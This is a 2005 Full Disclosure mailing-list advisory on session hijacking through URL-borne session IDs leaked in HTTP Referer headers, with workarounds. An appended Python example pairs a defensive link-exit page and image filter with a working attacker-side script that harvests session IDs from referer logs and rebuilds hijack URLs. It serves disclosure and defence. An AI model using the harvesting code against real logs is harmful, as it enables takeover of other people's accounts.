Full Disclosure mailing list archives

Referers Are Evil


From: Ripe Md <ripemd160 () gmail com>
Date: Sun, 7 Aug 2005 16:44:21 +0200

With referers (HTTP_REFERER) it is easy to take over sessions in some
Web applications, forums (phpBB) and so on. If a user of such an
application doesn't allow the use of cookies, the session information
is mostly transported over the URL. If somebody else places a
hyperlink, for example in a forum, which points to a server that another
person owns, the other person just has to read the referer log of
this server. The same problem also occurs in forums which allow the
inclusion of external pictures, for example with the [IMG] BB tag.

Work-Around:
On the Clientside:
Disable the sending of the Referer in the Browser.

On the Serverside:
for Links:
- Use a URL database, and store all hyperlinks of your users in it.
- Make a link exit page, which doesn't include any sensitive information.
For pictures:
- Just don't allow users to include external pictures.
Or your application should only be accessible via the use of cookies.

Sincerely

~ RIPEMD160
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
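The leak and the server-side workaround from the post above, as an added example that is not part of the original message and not phpBB code. The first part is what the attacker does: parse the referer column of an ordinary Apache "combined" access log on a server they control and pull out any session parameter (sid, PHPSESSID, ...) carried in the URL of the page that linked or embedded the image. The second part is the forum side: an in-memory URL database handing out opaque tokens, an exit page whose own URL carries nothing sensitive, and a filter that drops [IMG] tags pointing at hosts the forum does not own. The log lines, host names, session IDs and the /exit?t= path are all constructed for the example.

```python
import html
import re
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed sample: Apache "combined" log lines as they would appear on the
# attacker's server. The Referer is the fourth quoted field. Hosts, paths and
# session IDs are invented for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2005:16:40:01 +0200] "GET /banner.png HTTP/1.1" 200 4312 "http://forum.example/viewtopic.php?t=17&sid=4f3c2a9b1e8d7c6b5a4f3e2d1c0b9a87" "Mozilla/5.0"
203.0.113.9 - - [07/Aug/2005:16:41:17 +0200] "GET /banner.png HTTP/1.1" 200 4312 "http://forum.example/viewtopic.php?t=17" "Mozilla/5.0"
203.0.113.7 - - [07/Aug/2005:16:42:40 +0200] "GET / HTTP/1.1" 200 812 "http://forum.example/index.php?PHPSESSID=0a1b2c3d4e5f60718293a4b5c6d7e8f9" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
# Query parameter names that commonly carry a session ID in the URL (compared case-insensitively).
SESSION_PARAMS = {"sid", "phpsessid", "sessionid", "session_id"}


def harvest_sessions(log_text):
    """Attacker side: return (client, page_url, param, session_value) for every
    log line whose Referer carries a session parameter in its query string."""
    found = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("referer"):
            continue
        parts = urlsplit(m.group("referer"))
        for name, values in parse_qs(parts.query).items():
            if name.lower() in SESSION_PARAMS:
                page = parts._replace(query="", fragment="").geturl()
                found.append((m.group("host"), page, name, values[0]))
    return found


def hijack_url(entry):
    """Rebuild the URL the attacker would open to ride the victim's session."""
    _client, page, name, value = entry
    return "%s?%s=%s" % (page, name, value)


class LinkExit:
    """Forum side: URL database plus exit page. Posts link to /exit?t=<token>
    (a hypothetical path) instead of to the external URL directly."""

    def __init__(self):
        self._by_token = {}
        self._by_url = {}

    def register(self, url):
        """Store an outbound URL once and return its opaque token."""
        if url not in self._by_url:
            token = secrets.token_urlsafe(12)
            self._by_token[token] = url
            self._by_url[url] = token
        return self._by_url[url]

    def rewrite_links(self, post_html):
        """Replace absolute http(s) hrefs in a rendered post with exit-page links;
        relative links to the forum itself are left alone."""
        return re.sub(
            r'href="(https?://[^"]+)"',
            lambda m: 'href="/exit?t=%s"' % self.register(m.group(1)),
            post_html,
        )

    def exit_page(self, token):
        """Response for GET /exit?t=<token>. Served as a plain HTML page rather
        than a 302, because browsers generally keep the Referer of the page that
        held the link across a redirect. The exit page's own URL holds only the
        token, so that is the most the external site's referer log can see."""
        target = self._by_token.get(token)
        if target is None:
            return 404, "text/html", "<p>Unknown link</p>"
        safe = html.escape(target, quote=True)
        body = (
            '<!DOCTYPE html><html><head><meta http-equiv="refresh" content="0;url=%s">'
            '</head><body><p>Leaving the forum: <a href="%s">%s</a></p></body></html>'
            % (safe, safe, safe)
        )
        return 200, "text/html", body


def filter_img_tags(bbcode, allowed_hosts):
    """Drop [img] tags whose URL is not on one of the forum's own hosts."""
    def repl(m):
        host = urlsplit(m.group(1)).hostname or ""
        return m.group(0) if host in allowed_hosts else "[external image removed]"
    return re.sub(r"\[img\](https?://[^\[\]]+)\[/img\]", repl, bbcode, flags=re.I)


if __name__ == "__main__":
    for entry in harvest_sessions(SAMPLE_LOG):
        print("leaked by %s: %s" % (entry[0], hijack_url(entry)))
    forum = LinkExit()
    print(forum.rewrite_links('<a href="http://attacker.example/">click</a>'))
    print(filter_img_tags("[img]http://attacker.example/x.png[/img]", {"forum.example"}))
```

Run as a script it prints the two session-carrying URLs an attacker could reconstruct from the sample log, a post with its outbound link rewritten to the exit page, and the filtered image tag. The token is only a key into the URL database, so nothing about the clicking user is recoverable from it; the rewrite deliberately matches absolute URLs only, because a relative link stays on the forum and never reaches a foreign referer log.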